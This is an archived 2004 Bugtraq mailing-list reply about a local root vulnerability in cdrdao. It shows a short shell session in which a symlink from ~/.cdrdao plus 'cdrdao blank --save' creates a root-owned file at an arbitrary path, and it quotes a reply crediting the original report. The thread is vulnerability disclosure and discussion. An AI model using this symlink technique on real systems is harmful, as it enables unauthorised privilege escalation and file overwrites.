[36810] in bugtraq
Re: cdrdao local root exploit
daemon@ATHENA.MIT.EDU (newbug Tseng)
Fri Oct 1 18:28:30 2004
Date: 1 Oct 2004 19:05:58 -0000
Message-ID: <20041001190558.32460.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: newbug Tseng <newbug@chroot.org>
To: bugtraq@securityfocus.com
In-Reply-To: <1157225765.20040907131857@SECURITY.NNOV.RU>
The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2).
I think cdrdao should drop root permission before save the config.
[newbug@localhost tmp]$ ls -al /blah
ls: /blah: No such file or directory
[newbug@localhost tmp]$ ln -s /blah .cdrdao
[newbug@localhost tmp]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-5mdk
[newbug@localhost tmp]$ cdrdao blank --save
.
.
.
[newbug@localhost tmp]$ ls -al /blah
-rw-rw-r-- 1 root cdwriter 32 10月 2 10:41 /blah
[newbug@localhost tmp]$
newbug Tseng
>Received: (qmail 6527 invoked from network); 7 Sep 2004 21:09:36 -0000
>Received: from mail2.securityfocus.com (205.206.231.1)
> by mail.securityfocus.com with SMTP; 7 Sep 2004 21:09:36 -0000
>Received: (qmail 13209 invoked by alias); 7 Sep 2004 21:11:52 -0000
>Delivered-To: archive-bugtraq@securityfocus.com
>Received: (qmail 13206 invoked from network); 7 Sep 2004 21:11:52 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
> by mail2.securityfocus.com with SMTP; 7 Sep 2004 21:11:52 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
> by outgoing2.securityfocus.com (Postfix) with QMQP
> id 4864914374E; Tue, 7 Sep 2004 09:06:54 -0600 (MDT)
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Received: (qmail 26314 invoked from network); 7 Sep 2004 03:04:40 -0000
>Date: Tue, 7 Sep 2004 13:18:57 +0400
>From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
>Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
>Organization: http://www.security.nnov.ru
>X-Priority: 3 (Normal)
>Message-ID: <1157225765.20040907131857@SECURITY.NNOV.RU>
>To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias@caramail.com>
>Cc: bugtraq@securityfocus.com
>Subject: Re: cdrdao local root exploit
>In-Reply-To: <20040905191642.18379.qmail@www.securityfocus.com>
>References: <20040905191642.18379.qmail@www.securityfocus.com>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=Windows-1251
>Content-Transfer-Encoding: 8bit
>
>Dear Jйrфme ATHIAS,
>
>This bug was originally reported to Bugtraq by Andreas Mueller on
>January, 15 2002
>
>--Sunday, September 5, 2004, 11:16:42 PM, you wrote to bugtraq@securityfocus.com:
>
>JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao"
>
>
>
>--
>~/ZARAZA
>Неприятности начнутся в восемь. (Твен)
>
>
